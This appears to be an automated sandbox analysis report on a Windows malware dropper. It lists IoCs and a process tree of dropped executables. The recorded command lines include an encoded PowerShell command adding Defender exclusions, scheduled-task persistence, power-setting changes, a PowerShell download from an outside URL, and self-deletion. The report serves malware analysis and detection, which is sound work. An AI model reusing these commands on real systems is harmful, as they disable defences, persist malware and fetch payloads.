Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Client.exepid process 824 Client.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
win1.exeAcroRd32.exepid process 2680 win1.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe 5288 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New Text Document mod.exexin.exeSetup.exeoutput.execrt.execrt.tmpAcroRd32.execomp.exeRdrCEF.exedescription pid process target process PID 4860 wrote to memory of 4392 4860 New Text Document mod.exe xin.exe PID 4860 wrote to memory of 4392 4860 New Text Document mod.exe xin.exe PID 4860 wrote to memory of 4392 4860 New Text Document mod.exe xin.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4392 wrote to memory of 1584 4392 xin.exe MsBuild.exe PID 4860 wrote to memory of 3576 4860 New Text Document mod.exe eagleget-2-1-6-50.exe PID 4860 wrote to memory of 3576 4860 New Text Document mod.exe eagleget-2-1-6-50.exe PID 4860 wrote to memory of 3268 4860 New Text Document mod.exe AntiVirus2.exe PID 4860 wrote to memory of 3268 4860 New Text Document mod.exe AntiVirus2.exe PID 4860 wrote to memory of 3268 4860 New Text Document mod.exe AntiVirus2.exe PID 4860 wrote to memory of 5860 4860 New Text Document mod.exe Setup.exe PID 4860 wrote to memory of 5860 4860 New Text Document mod.exe Setup.exe PID 4860 wrote to memory of 5860 4860 New Text Document mod.exe Setup.exe PID 4860 wrote to memory of 4600 4860 New Text Document mod.exe svchost.exe PID 4860 wrote to memory of 4600 4860 New Text Document mod.exe svchost.exe PID 4860 wrote to memory of 2680 4860 New Text Document mod.exe win1.exe PID 4860 wrote to memory of 2680 4860 New Text Document mod.exe win1.exe PID 5860 wrote to memory of 3080 5860 Setup.exe comp.exe PID 5860 wrote to memory of 3080 5860 Setup.exe comp.exe PID 5860 wrote to memory of 3080 5860 Setup.exe comp.exe PID 5860 wrote to memory of 3080 5860 Setup.exe comp.exe PID 4860 wrote to memory of 2184 4860 New Text Document mod.exe output.exe PID 4860 wrote to memory of 2184 4860 New Text Document mod.exe output.exe PID 4860 wrote to memory of 2184 4860 New Text Document mod.exe output.exe PID 2184 wrote to memory of 5288 2184 output.exe AcroRd32.exe PID 2184 wrote to memory of 5288 2184 output.exe AcroRd32.exe PID 2184 wrote to memory of 5288 2184 output.exe AcroRd32.exe PID 2184 wrote to memory of 4984 2184 output.exe SIG.EXE PID 2184 wrote to memory of 4984 2184 output.exe SIG.EXE PID 2184 wrote to memory of 4984 2184 output.exe SIG.EXE PID 4860 wrote to memory of 5992 4860 New Text Document mod.exe alabi.exe PID 4860 wrote to memory of 5992 4860 New Text Document mod.exe alabi.exe PID 4860 wrote to memory of 5992 4860 New Text Document mod.exe alabi.exe PID 4860 wrote to memory of 4700 4860 New Text Document mod.exe crt.exe PID 4860 wrote to memory of 4700 4860 New Text Document mod.exe crt.exe PID 4860 wrote to memory of 4700 4860 New Text Document mod.exe crt.exe PID 4700 wrote to memory of 5376 4700 crt.exe crt.tmp PID 4700 wrote to memory of 5376 4700 crt.exe crt.tmp PID 4700 wrote to memory of 5376 4700 crt.exe crt.tmp PID 4860 wrote to memory of 7312 4860 New Text Document mod.exe oiii.exe PID 4860 wrote to memory of 7312 4860 New Text Document mod.exe oiii.exe PID 5376 wrote to memory of 7092 5376 crt.tmp soundermidiplayer.exe PID 5376 wrote to memory of 7092 5376 crt.tmp soundermidiplayer.exe PID 5376 wrote to memory of 7092 5376 crt.tmp soundermidiplayer.exe PID 5288 wrote to memory of 6072 5288 AcroRd32.exe RdrCEF.exe PID 5288 wrote to memory of 6072 5288 AcroRd32.exe RdrCEF.exe PID 5288 wrote to memory of 6072 5288 AcroRd32.exe RdrCEF.exe PID 5376 wrote to memory of 6300 5376 crt.tmp soundermidiplayer.exe PID 5376 wrote to memory of 6300 5376 crt.tmp soundermidiplayer.exe PID 5376 wrote to memory of 6300 5376 crt.tmp soundermidiplayer.exe PID 3080 wrote to memory of 4892 3080 comp.exe FUT.au3 PID 3080 wrote to memory of 4892 3080 comp.exe FUT.au3 PID 3080 wrote to memory of 4892 3080 comp.exe FUT.au3 PID 5288 wrote to memory of 7676 5288 AcroRd32.exe RdrCEF.exe PID 5288 wrote to memory of 7676 5288 AcroRd32.exe RdrCEF.exe PID 5288 wrote to memory of 7676 5288 AcroRd32.exe RdrCEF.exe PID 6072 wrote to memory of 4080 6072 RdrCEF.exe RdrCEF.exe PID 6072 wrote to memory of 4080 6072 RdrCEF.exe RdrCEF.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 5160 attrib.exe 1844 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\a\xin.exe"C:\Users\Admin\AppData\Local\Temp\a\xin.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"2⤵
- Executes dropped EXE
PID:3576
-
-
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5860 -
C:\Windows\SysWOW64\comp.exeC:\Windows\SysWOW64\comp.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\FUT.au3C:\Users\Admin\AppData\Local\Temp\FUT.au34⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\a\win1.exe"C:\Users\Admin\AppData\Local\Temp\a\win1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\a\output.exe"C:\Users\Admin\AppData\Local\Temp\a\output.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5288 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:6072 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D102CB75D170B7E09563B70E4305FCB0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D102CB75D170B7E09563B70E4305FCB0 --renderer-client-id=2 --mojo-platform-channel-handle=1688 --allow-no-sandbox-job /prefetch:15⤵PID:4080
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=579B730976798954F9B9477E837D58A4 --mojo-platform-channel-handle=1820 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:5924
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A351653D3A0725C2DBE5EC83E49D63F1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A351653D3A0725C2DBE5EC83E49D63F1 --renderer-client-id=4 --mojo-platform-channel-handle=2324 --allow-no-sandbox-job /prefetch:15⤵PID:6740
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DD09B76343697999A87294AAC3B4CD7D --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:6700
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CC32D3AA02115D5E08A5F796DA6BDE1 --mojo-platform-channel-handle=2732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:7920
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4436DEEF51B5BB6CF9FD1CF610E199B6 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:6244
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:7676
-
-
-
C:\Users\Admin\AppData\Local\Temp\SIG.EXE"C:\Users\Admin\AppData\Local\Temp\SIG.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\a\crt.exe"C:\Users\Admin\AppData\Local\Temp\a\crt.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\is-F687I.tmp\crt.tmp"C:\Users\Admin\AppData\Local\Temp\is-F687I.tmp\crt.tmp" /SL5="$1024A,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5376 -
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i4⤵
- Executes dropped EXE
PID:7092
-
-
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s4⤵
- Executes dropped EXE
PID:6300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:7312
-
-
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵PID:1988
-
C:\Windows\system32\mode.commode 65,104⤵PID:5280
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p563741341569714296105326100 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6468
-
-
C:\Windows\system32\attrib.exeattrib +H "svcshost.exe"4⤵
- Views/modifies file attributes
PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe"svcshost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAE0AbwBsAEIANwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAQgBUADIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATgBDAEEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBiAFYAMABjAEoANQBSADEAVgBXACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵PID:1396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAE0AbwBsAEIANwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAQgBUADIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATgBDAEEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBiAFYAMABjAEoANQBSADEAVgBXACMAPgA="6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:7372
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6824" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:7196
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6824" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:6896
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8000 -
C:\Users\Admin\AppData\Local\Temp\kat9313.tmpC:\Users\Admin\AppData\Local\Temp\kat9313.tmp3⤵
- Executes dropped EXE
PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6364 -
C:\Users\Admin\AppData\Local\Temp\kat9AB4.tmpC:\Users\Admin\AppData\Local\Temp\kat9AB4.tmp3⤵
- Executes dropped EXE
PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit3⤵PID:3196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5384 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsz9B53.tmp\abc.bat"3⤵PID:5724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:2344 -
C:\Windows\sysblardsv.exeC:\Windows\sysblardsv.exe3⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:7760 -
C:\Users\Admin\AppData\Local\Temp\259516163.exeC:\Users\Admin\AppData\Local\Temp\259516163.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:5608 -
C:\Windows\syslmgrsvc.exeC:\Windows\syslmgrsvc.exe5⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\2322128858.exeC:\Users\Admin\AppData\Local\Temp\2322128858.exe6⤵
- Executes dropped EXE
PID:6080
-
-
C:\Users\Admin\AppData\Local\Temp\1345921245.exeC:\Users\Admin\AppData\Local\Temp\1345921245.exe6⤵
- Executes dropped EXE
PID:1064
-
-
C:\Users\Admin\AppData\Local\Temp\624913175.exeC:\Users\Admin\AppData\Local\Temp\624913175.exe6⤵
- Executes dropped EXE
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\237345460.exeC:\Users\Admin\AppData\Local\Temp\237345460.exe6⤵PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\1397330615.exeC:\Users\Admin\AppData\Local\Temp\1397330615.exe6⤵PID:6068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\336738194.exeC:\Users\Admin\AppData\Local\Temp\336738194.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6868 -
C:\Windows\winqlsdrvcs.exeC:\Windows\winqlsdrvcs.exe5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:8160 -
C:\Users\Admin\AppData\Local\Temp\3759823002.exeC:\Users\Admin\AppData\Local\Temp\3759823002.exe6⤵
- Executes dropped EXE
PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\1957614520.exeC:\Users\Admin\AppData\Local\Temp\1957614520.exe6⤵
- Executes dropped EXE
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\1242839626.exeC:\Users\Admin\AppData\Local\Temp\1242839626.exe6⤵PID:6444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2930632633.exeC:\Users\Admin\AppData\Local\Temp\2930632633.exe4⤵
- Executes dropped EXE
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"5⤵
- Executes dropped EXE
PID:6876
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"5⤵
- Executes dropped EXE
PID:6336
-
-
